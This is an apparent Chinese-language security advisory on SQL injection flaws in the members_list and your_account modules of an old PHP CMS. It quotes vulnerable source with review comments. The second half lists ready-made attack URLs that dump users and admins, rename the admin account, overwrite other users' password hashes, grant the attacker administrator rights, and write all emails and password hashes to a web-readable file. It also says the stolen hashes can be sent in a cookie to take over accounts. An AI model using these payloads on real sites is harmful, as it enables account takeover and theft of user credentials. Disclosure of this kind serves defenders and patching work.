members_list、your_account模块中存在SQL注入缺陷。如果magic_quotes_gpc选项为“off”,攻击者可使用下列攻击方法及代码利用该缺陷:
php代码/位置:
| ?/modules/members_list/index.php : ------------------------------------------------------------------------ [...] $count = "select count(uid) as total from ".$user_prefix."_users "; $select = "select uid, name, uname, femail, url from ".$user_prefix."_users "; $where = "where uname != anonymous "; if ( ( $letter != "other" ) and ( $letter != "all" ) ) { $where .= "and uname like ".$letter."% "; } else if ( ( $letter == "other" ) and ( $letter != "all" ) ) { $where .= "and uname regexp \"^\[1-9]\" "; } else { $where .= ""; } $sort = "order by $sortby"; $limit = " asc limit ".$min.", ".$max; $count_result = sql_query($count.$where, $dbi); $num_rows_per_order = mysql_result($count_result,0,0); $result = sql_query($select.$where.$sort.$limit, $dbi) or die(); echo "<br>"; if ( $letter != "front" ) { echo "<table width=\"100%\" border=\"0\" cellspacing=\"1\"><tr>\n"; echo "<td bgcolor=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._nickname."</b></font></td>\n"; echo "<td bgcolor=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._realname."</b></font></td>\n"; echo "<td bgcolor=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._email."</b></font></td>\n"; echo "<td bgcolor=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._url."</b></font></td>\n"; $cols = 4; [...] ------------------------------------------------------------------------ /modules/your_account/index.php : switch($op) { [...] case "mailpasswd": mail_password($uname, $code); break; case "userinfo": userinfo($uname, $bypass, $hid, $url); break; case "login": login($uname, $pass); break; [...] case "saveuser": saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter); break; [...] 
case "savehome": savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson); break;
case "savetheme": savetheme($uid, $theme); break;
[...]
case "savecomm": savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax); break;
[...]
}
------------------------------------------------------------------------
/modules/your_account/index.php :
[...]
// saveuser(): writes a member's profile edits to <user_prefix>_users and,
// when a new password was supplied, re-issues the login cookie.
//
// Parameters: $uid plus every editable profile column ($realname, $email,
// $femail, $url, $bio, $user_* ..., $newsletter); $pass/$vpass are the new
// password and its confirmation; $attach is read but has no visible effect.
// Returns nothing; on success it redirects with header().
// Presumably all arguments arrive straight from the request through the
// $op dispatch above - confirm against the module's entry point.
//
// NOTE(review): every argument is interpolated into the SQL text below
// without escaping or quoting (single quotes may have been stripped from
// this excerpt - verify against the original file). Numeric columns should
// be cast (e.g. intval) and string columns escaped with the database's
// escaping function before being placed in a query; the trailing
// "where uid=$uid" does not by itself confine the update to the caller's
// row, because the SET clause is built from the same unchecked data.
function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {
    global $user, $cookie, $userinfo, $editedmessage, $user_prefix, $dbi, $module_name;
    // Ownership check: the user name and password hash carried in the
    // cookie must match the row for $uid. $check is itself interpolated
    // into the query, so cookie contents need the same escaping as form data.
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) and ($check2 == $ccpass)) {
        // NOTE(review): the literal below reads "http://";, in this excerpt -
        // most likely an extraction artefact; confirm against the source.
        if (!eregi("http://";, $url)) {
            $url = "http://$url";
        }
        if ((isset($pass)) && ("$pass" != "$vpass")) {
            echo "<center>"._passdifferent."</center>";
        }
        // $minpass is not in the global list above, so inside this function
        // it is unset and this length check cannot reject a short password -
        // verify against the original file.
        elseif (($pass != "") && (strlen($pass) < $minpass)) {
            echo "<center>"._youpassmustbe." 
<b>$minpass</b> "._charlong."</center>";
        } else {
            // filter_text() leaves its result in the global $editedmessage.
            if ($bio) {
                filter_text($bio);
                $bio = $editedmessage;
                $bio = fixquotes($bio);
            }
            if ($pass != "") {
                cookiedecode($user);
                sql_query("lock tables ".$user_prefix."_users write", $dbi);
                // The password is stored as an unsalted MD5 digest.
                $pass = md5($pass);
                sql_query("update ".$user_prefix."_users set name=$realname, email=$email, femail=$femail, url=$url, pass=$pass, bio=$bio , user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ, user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig, user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm, newsletter=$newsletter where uid=$uid", $dbi);
                // Re-read the row so the cookie is rebuilt with the new hash.
                $result = sql_query("select uid, uname, pass, storynum, umode, uorder, thold, noscore, ublockon, theme from ".$user_prefix."_users where uname=$uname and pass=$pass", $dbi);
                if(sql_num_rows($result, $dbi)==1) {
                    $userinfo = sql_fetch_array($result, $dbi);
                    docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],
                        $userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],
                        $userinfo[theme],$userinfo[commentmax]);
                } else {
                    echo "<center>"._somethingwrong."</center><br>";
                }
                sql_query("unlock tables", $dbi);
            } else {
                sql_query("update ".$user_prefix."_users set name=$realname, email=$email, femail=$femail, url=$url, bio=$bio, user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ, user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig, user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm, newsletter=$newsletter where uid=$uid", $dbi);
                // $a is assigned here but never read within this function.
                if ($attach) {
                    $a = 1;
                } else {
                    $a = 0;
                }
            }
            header("location: modules.php?name=$module_name");
        }
    }
}
[...]
// savehome(): stores a member's home-page preferences (story count, custom
// block, broadcast and private-message flags) and refreshes the login cookie.
//
// Parameters: $uid, $uname, $storynum, $ublockon, $ublock, $broadcast,
// $popmeson - presumably request values passed through the $op dispatch;
// confirm against the entry point. Returns nothing; redirects on success.
//
// NOTE(review): only $ublockon is normalised (to 0/1) before use. $storynum,
// $broadcast, $popmeson and $uid are interpolated into the UPDATE unescaped
// and unquoted (quotes may have been stripped from this excerpt - verify
// against the original). Numeric fields should be cast and string fields
// escaped before they reach the query text.
function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson) {
    global $user, $cookie, $userinfo, $user_prefix, $dbi, $module_name;
    // Ownership check against the cookie; $check is interpolated unescaped.
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) and ($check2 == $ccpass)) {
        if(isset($ublockon)) $ublockon=1; else $ublockon=0;
        // fixquotes() is defined elsewhere; whether it escapes for SQL cannot
        // be told from this excerpt.
        $ublock = fixquotes($ublock);
        sql_query("update ".$user_prefix."_users set storynum=$storynum, ublockon=$ublockon, ublock=$ublock, broadcast=$broadcast, popmeson=$popmeson where uid=$uid", $dbi);
        // Reload the user row and re-issue the cookie from it.
        getusrinfo($user);
        docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],
            $userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],
            $userinfo[theme],$userinfo[commentmax]);
        header("location: modules.php?name=$module_name");
    }
}
// savetheme(): stores the member's chosen theme and refreshes the cookie.
//
// Parameters: $uid and $theme, presumably request values - confirm against
// the entry point. Returns nothing; redirects on success.
//
// NOTE(review): $theme is placed directly into the SET clause without
// escaping or validation, and is also reflected into the Location header
// without URL encoding. A theme name should be checked against the set of
// installed themes (or at least escaped) before either use.
function savetheme($uid, $theme) {
    global $user, $cookie, $userinfo, $user_prefix, $dbi, $module_name;
    // Ownership check against the cookie; $check is interpolated unescaped.
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) and ($check2 == $ccpass)) {
        sql_query("update ".$user_prefix."_users set theme=$theme where uid=$uid", $dbi);
        getusrinfo($user);
        docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],
            $userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],
            $userinfo[theme],$userinfo[commentmax]);
        header("location: modules.php?name=$module_name&theme=$theme");
    }
}
[...]
// savecomm(): stores the member's comment-display preferences and refreshes
// the login cookie.
//
// Parameters: $uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax -
// presumably request values passed through the $op dispatch; confirm against
// the entry point. Returns nothing; redirects on success.
//
// NOTE(review): only $noscore is normalised (to 0/1). $umode, $uorder,
// $thold, $commentmax and $uid go into the UPDATE unescaped and unquoted
// (quotes may have been stripped from this excerpt - verify against the
// original). Cast the numeric fields and escape the string ones before
// building the query.
function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax) {
    global $user, $cookie, $userinfo, $user_prefix, $dbi, $module_name;
    // Ownership check against the cookie; $check is interpolated unescaped.
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) and ($check2 == $ccpass)) {
        if(isset($noscore)) $noscore=1; else $noscore=0;
        sql_query("update ".$user_prefix."_users set umode=$umode, uorder=$uorder, thold=$thold, noscore=$noscore, commentmax=$commentmax where uid=$uid", $dbi);
        // Reload the user row and re-issue the cookie from it.
        getusrinfo($user);
        docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],
            $userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],
            $userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
        header("location: modules.php?name=$module_name");
    }
}
[...]
------------------------------------------------------------------------
/modules/your_account/index.php :
[...]
// mail_password(): excerpt only - the function body is truncated below.
// $uname is interpolated into the lookup query unescaped.
function mail_password($uname, $code) {
    global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi, $module_name;
    $result = sql_query("select email, pass from ".$user_prefix."_users where (uname=$uname)", $dbi);
    if(!$result) {
        include("header.php");
        opentable();
        echo "<center>"._sorrynouserinfo."</center>";
        closetable();
        include("footer.php");
[...]
------------------------------------------------------------------------
------------------------------------------------------------------------
[...]
// userinfo(): excerpt only - the function body is truncated below.
// $uname is interpolated into the profile lookup unescaped.
function userinfo($uname, $bypass=0, $hid=0, $url=0) {
    global $user, $cookie, $sitename, $prefix, $user_prefix, $dbi, $admin, $broadcast_msg, $my_headlines, $module_name;
    $result = sql_query("select uid, femail, url, bio, user_avatar, user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest, user_sig, pass, newsletter from ".$user_prefix."_users where uname=$uname", $dbi);
    $userinfo = sql_fetch_array($result, $dbi);
[...]
------------------------------------------------------------------------ ------------------------------------------------------------------------ [...] function login($uname, $pass) { global $setinfo, $user_prefix, $dbi, $module_name; $result = sql_query("select pass, uid, storynum, umode, uorder, thold, noscore, ublockon, theme, commentmax from ".$user_prefix."_users where uname=$uname", $dbi); $setinfo = sql_fetch_array($result, $dbi); [...] } [...] ------------------------------------------------------------------------ |
members_list模块:
- 显示用户:
http://[target]/modules.php?name=members_list&letter=all&sortby=pass
- 显示用户:
http://[target]/modules.php?name=members_list&letter=all&sortby=uid
- 显示moderators :
http://[target]/modules.php?name=members_list&letter=%20or%20user_level=2/*
- 显示管理员:
http://[target]/modules.php?name=members_list&letter=%20or%20user_level=4/*
- 显示所有以“abc”开头的用户 :
http://[target]/modules.php?name=members_list&letter=%20or%20pass%20like%20abc%25/*
your_account模块 :
- 将“admin”用户更名为“hophophop” :
http://[target]/modules.php?name=your_account&op=savetheme&theme=,name=hophophop%20where%20uname=admin/*&uid=[our_uid]
- 在md5_decrypted中将“bob”的密码改为“d41d8cd98f00b204e9800998ecf8427e”:
http://[target]/modules.php?name=your_account&op=savetheme&theme=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=bob/*&uid=[our_uid]
或:
http://[target]/modules.php?name=your_account&op=saveuser&realname=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=bob/*&uid=[our_uid]
或:
http://[target]/modules.php?name=your_account&op=saveuser&email=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=bob/*&uid=[our_uid]
或:
http://[target]/modules.php?name=your_account&op=savehome&storynum=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=bob/*&uid=[our_uid]
或:
http://[target]/modules.php?name=your_account&op=savehome&ublockon=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=bob/*&uid=[our_uid]
或:
http://[target]/modules.php?name=your_account&op=savecomm&umode=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=bob/*&uid=[our_uid]
或:
http://[target]/modules.php?name=your_account&op=savecomm&thold=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=bob/*&uid=[our_uid]
- 将普通用户提升至管理员权限:
http://[target]/modules.php?name=your_account&op=savetheme&theme=,user_level=4&uid=[our_uid]
或:
http://[target]/modules.php?name=your_account&op=saveuser&femail=,user_level=4&uid=[our_uid]
或:
http://[target]/modules.php?name=your_account&op=saveuser&url=http://,user_level=4&uid=[our_uid]
或:
http://[target]/modules.php?name=your_account&op=savehome&broadcast=,user_level=4&uid=[our_uid]
或:
http://[target]/modules.php?name=your_account&op=savecomm&uorder=,user_level=4&uid=[our_uid]
- 将所有用户的电子邮件和加密后的密码保存在http://[target]/allmailpass.txt中 :
http://[target]/modules.php?name=your_account&op=mailpasswd&uname=)
%20or%201=1%20into%20outfile%20/[path/to/site]/allmailpass.txt/*
通过在cookie中发送这些加密后的密码即可访问相应用户帐户。
- 将用户的所有信息保存在http://[target]/admin.txt中:
http://[target]/modules.php?name=your_account&op=login&uname=%20or%user_level>
1%20into%20outfile%20/[path/to/site]/admin.txt
[path/to/site]能在http://[target]/modules/forums/bb_smilies.php中查询到。